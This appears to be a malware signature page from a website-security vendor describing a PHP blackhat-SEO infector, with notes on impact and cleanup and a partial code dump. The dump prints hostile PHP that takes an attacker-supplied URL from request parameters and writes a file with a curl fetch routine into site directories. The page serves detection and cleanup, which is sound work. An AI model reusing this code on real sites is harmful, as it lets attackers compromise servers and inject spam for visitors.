Malware Signatures

  1. Home
  2. Malware Signatures
  3. php.spam-seo.infector.001.002

php.spam-seo.infector.001.002

Blackhat SEO is a malicious technique used to manipulate the search engine results in order to benefit a website in terms of relevance. The payload is PHP based, thus intended for server-side use and the payload is executed directly on the server, while the site is loaded. Only the payload result (such as malicious iframe, or redirect) is visible in the browser, not the malicious code itself.
This is the code responsible for injecting the conditional spam algorithm inside site's PHP files. It allows the attacker to insert, remove or even change the spam campaign that a website will be part of.
It has functions to autodetect popular CMSs and infect according to it.

Affecting

Any vulnerable website. Outdated software or compromised passwords can act as an infection vector.

Cleanup

Cleanup is done by deleting the malicious code inside the file or replacing it with a fresh version. The infection can be found in your system by searching for CURL requests inside your site's files.
You can also sign up with us and let our team remove the malware for you.

Dump


if ($req == "addd") {

echo "Try to add dor..." . "n";

$durl = $_GET['c'];
$durl = str_replace("\", "", $durl);

$dkey = "xxx";
$dkey = $_GET['k'];
$dkey = str_replace("\", "", $dkey);

$dfile = "link.php";
$dir = "../../..";

$cont = '<' . '?' . 'php $dor_dir = "' . $durl . '";' ;

$cont .= 'function get_content2($URL){$ch=curl_init();curl_setopt($ch,CURLOPT_URL,$URL);curl_setopt($ch,CURLOPT_HEADER,0);curl_setopt($ch,CURLOPT_FOLLOWLOCATION,0);curl_setopt($ch,CURLOPT_RETURNTRANSFER,TRUE);curl_setopt($ch,CURLOPT_USERAGENT,$_SERVER["HTTP_USER_AGENT"]);$result=curl_exec($ch);curl_close($ch);return $result;}';

/*